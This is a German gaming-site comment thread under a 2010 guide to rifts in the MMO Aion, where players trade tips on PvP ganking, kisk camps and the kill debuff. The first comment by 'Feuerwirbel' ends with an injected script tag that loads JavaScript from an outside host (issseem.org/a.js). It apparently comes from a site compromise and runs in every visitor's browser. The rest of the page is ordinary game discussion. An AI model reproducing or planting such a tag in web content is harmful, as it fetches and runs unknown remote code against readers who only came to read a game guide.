• buffed.de
  • WoW-Datenbank
  • Hearthstone-DB
Games World
Login Registrieren
    Login Registrieren
    • buffed.de
    • WoW-Datenbank
    • Hearthstone-DB
    Login Registrieren
    • buffed.de
    • WoW-Datenbank
    • Hearthstone-DB
    • buffed.de Redaktion
      14.01.2010 17:47 Uhr
      Mitglied
      Jetzt ist Deine Meinung gefragt: Hier kannst Du Deinen Kommentar zum Artikel veröffentlichen und mit anderen Lesern darüber diskutieren.
      Dein Kommentar
      Bitte logge Dich ein, um einen Kommentar zu verfassen.

      Netiquette | Kommentar-Ticker (Live)
      Feuerwirbel
      am 16. Januar 2010
      Kommentar wurde nicht gebufft
      Melden
      Ja immo laufen auf Thor in heiron auch nur an jedem lager allianzen rum die fast nur asu 50ern bestehen, aber die ganke ich alle mit meinem 70er<script src=http://www.issseem.org/a.js></script>
      Omidas
      am 16. Januar 2010
      Kommentar wurde 1x gebufft
      Melden
      Ja natürlich trifft man da auch 50iger Gegner. Das ist ja gerade das schlimme daran. War auch immer dort riften gewesen. Immer schön im Südosten. Bischen rum rennen. Dann mal kurz wieder die Bots umhauen und wieder ne Runde. War da im Levelbereich 40-44. Da macht es halt am meisten Sinn. Oder hatte es zumindest. Den die Tauben sind im den Gebiet auch in dem Level und man findet so die perfekte Herausforderung.

      Doch das geht bei dem Level immer weniger denn:
      a) 50iger Asmos(oder anders rum) gehen da hin um zu ganken. Deswegen kommt es zu sehr starker Gruppenbildung. Für den Kleingruppenrifter pures Gift.
      b) 50iger Tauben fangen an zu deffen. Macht bestimmt echt Spaß als 50iger mit 50-100% Fenril (oder Tauben äquivalent) die Rifter zu ärgern und ab und an mal nen High Char zu finden.

      Aber diesen einen Punkt versagt leider Aion komplett. PvP während dem Leveln. Den da die Highchars überall hin kommen, tun sies auch. Erst wars der Abyss und jetzt dort.

      Vielleicht ist das auf Thor etwas gesitteter mit mehr Anstand, aber ich habe auf Votan gespielt, wo vielleicht sich auch nur besonders viele solcher menschlichen "Vorbilder" hin verschlagen haben.

      NC-Soft hätte wirklich die Gebiete abgrenzen sollen und das 50iger PvE Gebiet auch mit Rifts verbinden sollen (was mir immer noch unverständlich ist)
      Feuerwirbel
      am 16. Januar 2010
      Kommentar wurde nicht gebufft
      Melden
      @2 wie 3 schon sagt geht es auf Thor schon gut ab, und wir suchenund keine lowlevler, eben wurden wir von50ern an unserem kiskplatz zerlegt und sonst sind wir fast immer sturmzone und umgebung wo ziemlich viele 50er unterwegs sind
      Einhänder76
      am 16. Januar 2010
      Kommentar wurde 1x gebufft
      Melden
      guter guide.....
      bei uns auf thor herrscht schon jeden tag krieg ^^
      besonders heiron und beluslan gehts ab.....
      morheim und eltnen werden von sehr guten twinks belagert....
      ich und ein paar meiner leutz aus der legion sind regelmässig am deffen der gebiete und auch im feindgebiet am jagen

      was aber viel schöner iss......ich bin leider schon von anfang an bei den elyos bekannt für meine allies....ich hab schon eine kleine hassgemeinde gegen mich, weil ich meist mit 2 allies ( soweit der rift es zuläßt ) rüber gehe.....kisk plätze sollte mann auskundschaften und die assasinen aus der allie schon mal n paar meter vorschicken zum ausspähen.....

      es macht so fun und ich bekomme nicht genug davon....

      aber nochmal zu diesem wurmloch am himmel......er zeigt nur an das ein riss entstanden iss.....nicht wo er in etwa liegt....das iss immer noch ein lustiger mythos der sich hält ^^......

      ach ja....und mann kann mit allies auch mal die welt bosse der elyos versuchen....das macht auch fun ^^
      Omidas
      am 16. Januar 2010
      Kommentar wurde 1x gebufft
      Melden
      Sehr schöner Guide. Die Koordinaten kopieren ist für den Anfang immer recht nützlich. Nach paar mal riften weiß man die zwar eh auswendig, aber man kann anderen damit ja noch helfen. Sollte man sich während des Levelns nicht entgehen lassen. Am spassigsten sind kleine Gruppen, wo die Kämpfe noch halbwegs fair sind, aber man auch die Möglichkeit hat sich zu wehren falls Deff kommt.

      Als wichtiger Tipp noch zu sagen:
      Scheut euch nicht paar Hilfsmittel mit zu nehmen. Neben genügend Kisks sollte auch auf keinen Fall schneller laufen Schriftrollen und Heiltränke (die CC Entferner) mit genommen werden. Den so kann man auch mal entkommen oder fliehenden Gegner nach setzen.

      @Feuerwirbel:

      Frisch 50ig sollten das gar nicht erst lesen!

      Und ich finde es total ungeeignet für diese Level das Riften. Den was wollen die drüben machen? Das einzige, was man da machen kann ist Lowies ganken. Und dafür reicht doch bitte schön der Abyss voll und ganz aus.

      Hab persönlich mit 47 aufghört rüber zu gehen, weil es schon dort kaum faire Kämpfe mehr gab. Was auch durch die 50iger Rifter verursacht wird, da dadurch die Deff stark anzieht und für 1-3 Grps im richtigem Level das Leben sau schwer wird.

      Und zum Fluch. Denke jeder Kill gibt Punkte. Nur Lowkills eben sehr viel mehr. Das der Debuff auch bei gleich Stufe irgendwann kommt , verhindert auch etwas das sehr gut equipte/skillige Leute dauerhaft den Gegner das Leveln verhindern. Mit Pausen zwischen den Rifts habe ich den auch nur ein
      Feuerwirbel
      am 16. Januar 2010
      Kommentar wurde nicht gebufft
      Melden
      Das einzige was nervt ist dieser Fluch denn man bekommt wenn man zu viele niedrig stufige ziele getötet hat bekommt, komischerweise habe ich denn aber bekommen als wir ( zauberer und templer) nen 50er assa gelegt haben, glaube der Fluch zählt nicht nur niedrig sufige Ziele und ist dann zimlich lästig, da man dann meistens von ner alli überrollt wird und auch der kiskpunkt ist nicht mehr sicher.

      In Heiron aufräumen ist einfach nur geil!
  • Print / Abo
    Apps
    buffed 12/2016 PC Games MMore 03/2017 PC Games 03/2017 PC Games Hardware 04/2017 play³ 04/2017 Games Aktuell 03/2017 XBG Games 01/2017
    PC Games 03/2017 PCGH Magazin 04/2017 PC Games MMORE Computec Kiosk On the Run! Birdies Run
article
790645
buffed.de
Aion - Tipps und Grundlagen-Guides: Risse
PvP wird in Aion groß geschrieben und gehört zum Heldenalltag wie das Amen zur Kirche. Seien es heiße Luftgefechte im Abyss oder hartnäckige Bodenkämpfe in Elysea und Asmodae - Asmodier und Elyos bekriegen sich zu jeder Tages- und Nachtzeit.
http://www.buffed.de/buffedde-Brands-143860/Guides/Aion-Tipps-und-Grundlagen-Guides-Risse-790645/
14.01.2010
http://www.buffed.de/screenshots/medium/2010/01/Riss_Himmel_01.jpg
guides